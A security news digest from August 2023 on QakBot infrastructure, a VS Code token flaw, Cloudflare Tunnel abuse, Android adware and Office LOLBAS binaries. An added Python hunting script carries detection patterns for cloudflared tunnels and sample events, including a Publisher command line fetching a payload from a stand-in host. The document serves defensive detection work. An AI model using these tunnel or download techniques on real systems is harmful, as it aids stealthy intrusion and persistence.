- The Hacker News
August 08, 2023. The operators of the QakBot (aka QBot) malware had set up 15 new command-and-control (C2) servers as of late June 2023.
The findings continue Team Cymru's analysis of the malware's infrastructure and arrive a little over two months after Lumen Black Lotus Labs revealed that 25% of QakBot's C2 servers are active for only a single day.
"QakBot has a history of taking an extended break each summer before returning sometime in September, with this year's spamming activities ceasing around 22 June 2023," the cybersecurity firm said.
"But are the QakBot operators actually on vacation when they aren't spamming, or is this 'break' a time for them to refine and update their infrastructure and tools?"
- BleepingComputer
August 08, 2023. Microsoft's Visual Studio Code (VS Code) editor and development environment contains a flaw that allows malicious extensions to retrieve authentication tokens stored in the Windows, Linux, and macOS credential managers.
These tokens are used to integrate with third-party services and APIs such as Git, GitHub, and other coding platforms, so stealing them could have significant consequences for a compromised organization's data security, up to unauthorized system access and data breaches.
The flaw was discovered by Cycode researchers, who reported it to Microsoft along with a working proof-of-concept (PoC). Microsoft nevertheless decided against fixing the issue, on the grounds that extensions are not expected to be sandboxed from the rest of the environment. Since the behaviour is by design, the practical mitigation is to treat every installed extension as code running with the developer's full user privileges and to vet extensions accordingly.
- BleepingComputer
August 07, 2023. Hackers are increasingly abusing the legitimate Cloudflare Tunnels feature to create stealthy HTTPS connections from compromised devices, bypass firewalls, and maintain long-term persistence.
The technique isn't entirely new: Phylum reported in January 2023 that threat actors had created malicious PyPI packages that used Cloudflare Tunnels to stealthily steal data or remotely access devices.
However, more threat actors appear to have adopted the tactic, as GuidePoint's DFIR and GRIT teams reported last week after seeing an uptick in activity.
- BleepingComputer
August 07, 2023. The Google Play store was infiltrated by 43 Android applications with a combined 2.5 million installs that secretly displayed advertisements while the phone's screen was off, draining the device's battery.
McAfee's Mobile Research Team discovered the malicious apps and reported them to Google for violating Google Play Store policies; Google subsequently removed them from Android's official store.
The applications were mainly media streaming apps and news aggregators, and the target audience was predominantly Korean. However, the same deceptive tactics could easily be applied to other app categories and more diverse user demographics.
- BleepingComputer
August 03, 2023. The list of LOLBAS files, legitimate binaries and scripts present in Windows that can be abused for malicious purposes, will soon include the main executables for Microsoft's Outlook email client and Access database management system.
The main executable for the Microsoft Publisher application has already been confirmed to be able to download payloads from a remote server.
LOLBAS stands for Living-off-the-Land Binaries and Scripts; these are typically described as signed files that are either native to the Windows operating system or downloaded from Microsoft.
They are legitimate tools that hackers can abuse during post-exploitation activity to download and/or run payloads without triggering defensive mechanisms.
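Two of the items in this digest, the Cloudflare Tunnels abuse above and the Office LOLBAS downloads here, call for the same kind of response from a SOC: hunting rules over endpoint telemetry. The script below is an added example written for this page; it is not code from BleepingComputer, GuidePoint, Phylum, the LOLBAS project or Microsoft. It runs over constructed Sysmon-style process-creation (ID 1), network-connection (ID 3) and DNS-query (ID 22) records; the Event field names, the sample events and the rule names are assumptions made for the example. The tunnel-edge domains (argotunnel.com, trycloudflare.com) and the cloudflared command-line forms (`tunnel run --token …`, `tunnel --url …`) are those the cloudflared client uses; the Office executable names are the Outlook, Access and Publisher binaries named in the LOLBAS item.

```python
"""Hunting rules for Cloudflare Tunnel abuse and Office LOLBAS downloads.

Added example for this digest, not code from any of the reported articles.
Event shape and field names are an assumption (simplified Sysmon-like records).
"""
import re
from dataclasses import dataclass


@dataclass
class Event:
    event_id: int          # Sysmon IDs: 1 = process create, 3 = network connect, 22 = DNS query
    image: str             # full path of the process that produced the event
    command_line: str = "" # populated for ID 1
    dest_host: str = ""    # populated for ID 3
    query: str = ""        # populated for ID 22


# cloudflared talks to *.argotunnel.com (tunnel edge); quick tunnels are served
# from *.trycloudflare.com. Matching on the suffix catches regionN.v2.argotunnel.com.
TUNNEL_EDGE = re.compile(r"(?:^|\.)(?:argotunnel\.com|trycloudflare\.com)$", re.I)

# Attackers rename cloudflared.exe, so also match its tunnel command line:
# "... tunnel run --token <jwt>" (named tunnel) or "... tunnel --url <origin>" (quick tunnel).
CLOUDFLARED_CMD = re.compile(r"\btunnel\b.*(?:--token\s+\S+|--url\s+\S+|\brun\b)", re.I)

# Office executables from the LOLBAS item; a URL on their command line is the download primitive.
LOLBAS_OFFICE = {"outlook.exe", "msaccess.exe", "mspub.exe"}
URL_ARG = re.compile(r"https?://\S+", re.I)


def basename(path: str) -> str:
    """Case-insensitive file name from a Windows or POSIX path."""
    return path.replace("\\", "/").rsplit("/", 1)[-1].lower()


def check_event(e: Event) -> list[str]:
    """Return the names of every rule the event trips (empty list if benign)."""
    rules = []
    name = basename(e.image)
    if e.event_id == 1:
        if name in ("cloudflared.exe", "cloudflared") or CLOUDFLARED_CMD.search(e.command_line):
            rules.append("cloudflared_tunnel_cmdline")
        if name in LOLBAS_OFFICE and URL_ARG.search(e.command_line):
            rules.append("office_lolbas_url_arg")
    elif e.event_id == 3 and TUNNEL_EDGE.search(e.dest_host):
        rules.append("tunnel_edge_connect")
    elif e.event_id == 22 and TUNNEL_EDGE.search(e.query):
        rules.append("tunnel_edge_dns")
    return rules


def hunt(events: list[Event]) -> list[tuple[str, Event]]:
    """Run every rule over every event; one (rule, event) pair per hit."""
    return [(rule, e) for e in events for rule in check_event(e)]


# Constructed sample telemetry (not real logs): a renamed cloudflared binary
# beaconing to the tunnel edge, a Publisher LOLBAS download, and benign noise.
SAMPLE_EVENTS = [
    Event(1, r"C:\Users\bob\AppData\Local\Temp\update.exe",
          command_line="update.exe tunnel run --token eyJhIjoiY29uc3RydWN0ZWQifQ"),
    Event(22, r"C:\Users\bob\AppData\Local\Temp\update.exe", query="region1.v2.argotunnel.com"),
    Event(3, r"C:\Users\bob\AppData\Local\Temp\update.exe", dest_host="region2.v2.argotunnel.com"),
    Event(1, r"C:\Program Files\Microsoft Office\root\Office16\MSPUB.EXE",
          command_line='"MSPUB.EXE" https://files.example/payload.txt'),
    Event(1, r"C:\Program Files\Microsoft Office\root\Office16\OUTLOOK.EXE",
          command_line='"OUTLOOK.EXE"'),
    Event(3, r"C:\Program Files\Microsoft Office\root\Office16\OUTLOOK.EXE",
          dest_host="outlook.office365.com"),
    Event(22, r"C:\Program Files\Google\Chrome\Application\chrome.exe", query="www.example.com"),
]


if __name__ == "__main__":
    for rule, ev in hunt(SAMPLE_EVENTS):
        print(f"{rule:28s} id={ev.event_id} image={ev.image}")
```

Two design choices matter in practice. Outlook legitimately makes network connections all day, so the Office rule keys on a URL argument at process creation rather than on connections; and the image-name check for cloudflared is the weakest of the three tunnel indicators, since the binary is trivially renamed, which is why the command-line and edge-domain rules carry the weight. Organisations that run Cloudflare Zero Trust legitimately will need to baseline their sanctioned cloudflared hosts before alerting on the tunnel rules.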
- Microsoft Shares Fix for Outlook Asking to Reopen Closed Windows
- Malicious Apps Use Sneaky Versioning Technique to Bypass Google Play Store Scanners
- Chrome Malware Rilide Targets Enterprise Users via PowerPoint Guides
- Malicious Windows Kernel Drivers Used in BlackCat Ransomware Attacks
- Microsoft Investigates Slow Windows VPN Speeds After May Updates